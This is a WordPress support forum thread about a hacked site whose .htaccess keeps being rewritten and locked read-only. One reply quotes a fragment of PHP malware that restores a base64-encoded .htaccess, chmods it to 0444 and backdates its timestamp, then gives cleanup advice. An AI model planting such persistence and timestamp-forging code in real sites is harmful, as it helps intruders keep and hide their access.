• On June 21, my 4 year old site got hacked for 1st time. And from that day onwards I am seeing often the .htaccess gets its permission changed to read-only and gets rewritten. The new content is actually a copy of the normal .htaccess file that comes with any WP installation (not the one of multisite).

    I am frustrated. My hosting company too has no clue why this is happening despite all the scanning, cleaning, reinstallation, etc.

    Please help.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Hi,

    If .htaccess file is still changing after necessary scanning that means your website still contains malicious code.

    Download your whole WordPress website in local system and scan it thoroughly with good updated anti-virus software and then upload your web content on web server.

    You can also restore your website from the good available backup before hack.

    It’s quite often, such hack leaves hidden malwares in Websites that can cause such issues. Here is an example of malware that can change .htaccess file’s permission to 444 every time you access the website.

    $path = $dir . ‘/.htaccess';
    $content = base64_decode(‘IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==’);
    if (file_exists($path) AND file_get_contents($path) != $content) {
    chmod($path, 0644);
    file_put_contents($path, $content);
    chmod($path, 0444);
    if (!$time) {
    $time = my_time($dir);
    }
    touch($path, $time);
    }
    }
    my_correct(dirname(__FILE__) . ‘/..’);

    Hope that helps.

    Thanks,

    Thread Starter Ramnath

    (@ramnath007)

    The scan was already performed by my hosting company HG. Still it’s occurring. I actually restore by untarring a clean backup instance of the main folder. So everything happens via the shell access (client: putty).

    But you are very close actually. I saw similar one liner scripts in the infested files.

    Can’t we see which process/script made these changes so that we can identify the issue?

    Thanks.

    Hi,

    Can’t we see which process/script made these changes so that we can identify the issue?

    Mostly such hacks or malware injections occurred due to poorly written, vulnerable, outdated themes and plugins. Make sure you update all WordPress themes and plugins and remove disabled plugins/themes.

    To determine what files are affected you can check the modification time of files and folders. After hack investigation is perhaps the hardest part and it requires the most work. It will also come down to your individual technical knowledge and insight around website hacks. Below are a few resources that will guide you to completely remove the malware:

    https://z9.io/2008/06/08/did-your-wordpress-site-get-hacked/
    https://blog.sucuri.net/2010/02/removing-malware-from-a-wordpress-blog-case-study.html
    https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    You can also ask your web hosting provider for logs where you can get extensive information like IP address, FTP access logs , modified files , timestamp etc.

    Thanks,

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘.htaccess Gets Rewritten’ is closed to new replies.